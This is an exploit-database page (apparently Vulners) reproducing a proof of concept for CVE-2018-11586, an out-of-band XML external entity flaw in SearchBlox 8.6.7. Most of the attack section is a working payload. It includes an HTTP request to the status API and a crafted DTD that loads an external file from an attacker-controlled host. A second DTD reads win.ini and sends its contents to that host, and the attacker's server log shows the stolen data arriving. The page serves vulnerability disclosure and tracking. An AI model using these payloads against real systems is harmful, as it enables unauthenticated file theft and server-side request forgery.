Vulners
Lucene search
SearchBlox 8.6.7 - XML External Entity Injection
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | SearchBlox 8.6.7 - XML External Entity Injection Vulnerability | 4 Jun 201800:00 | – | zdt |
 | CVE-2018-11586 | 6 Jun 201823:16 | – | circl |
 | SearchBlox XML External Entity Injection Vulnerability | 6 Jun 201800:00 | – | cnvd |
 | CVE-2018-11586 | 5 Jun 201821:00 | – | cve |
 | CVE-2018-11586 | 5 Jun 201821:00 | – | cvelist |
 | SearchBlox 8.6.7 - XML External Entity Injection | 4 Jun 201800:00 | – | exploitpack |
 | CVE-2018-11586 | 5 Jun 201821:29 | – | nvd |
 | CVE-2018-11586 | 5 Jun 201821:29 | – | osv |
 | SearchBlox 8.6.7 XML External Entity Injection | 4 Jun 201800:00 | – | packetstorm |
 | Server side request forgery (ssrf) | 5 Jun 201821:29 | – | prion |
10
# Exploit Title: SearchBlox 8.6.7 Out-Of-Band XML eXternal Entity (OOB-XXE)
# Exploit Author: Ahmet GUREL, Canberk BOLAT
# Software Link: https://www.searchblox.com/
# Version: < = SearchBlox Version 8.6.7
# Platform: Java
# Tested on: Windows
# CVE: CVE-2018-11586
# 1. DETAILS
An XML External Entity attack is a type of attack against an
application that parses XML input. This attack occurs when XML input
containing a reference to an external entity is processed by a weakly
configured XML parser. This attack may lead to the disclosure of
confidential data, denial of service, server side request forgery,
port scanning from the perspective of the machine where the parser is
located, and other system impacts. Reference:
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
# 2. PoC:
XML external entity (XXE) vulnerability in /searchblox/api/rest/status in
SearchBlox 8.6.7 allows remote unauthenticated users to read arbitrary
files or conduct server-side request forgery (SSRF) attacks via a crafted
DTD in an XML request.
HTTP Request:
_____________
GET /searchblox/api/rest/status HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=n9uolja8nwkj15nsv66xjlzci;
XSRF-TOKEN=6098a021-0e3c-409f-9da0-b895eff3025d; AdsOnPage=5;
AdsOnSearchPage=5
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 140
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE xxe [
<!ENTITY % dtd SYSTEM "http://192.168.1.2:7000/ext.dtd">
%dtd;
%all;
%send;]>
#Ext.dtd File :
_______________
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % file SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://192.168.1.2:7000/?%file;
'>">
%all;
#HTTP Response:
_______________
Ahmets-MacBook-Pro:Desktop ahmet$ python -m SimpleHTTPServer 7000
Serving HTTP on 0.0.0.0 port 7000 ...
192.168.1.2 - - [03/Jun/2018 15:37:16] "GET /ext.dtd HTTP/1.1" 200 -
192.168.1.2 - - [03/Jun/2018 15:37:16] "GET
/?;%20for%2016-bit%20app%20support%20[fonts]%20[extensions]%20[mci%20extensions]%20[files]%20[Mail]%20MAPI=1
HTTP/1.1" 200 -Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Jun 2018 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 27.5
CVSS 39.8
EPSS0.32607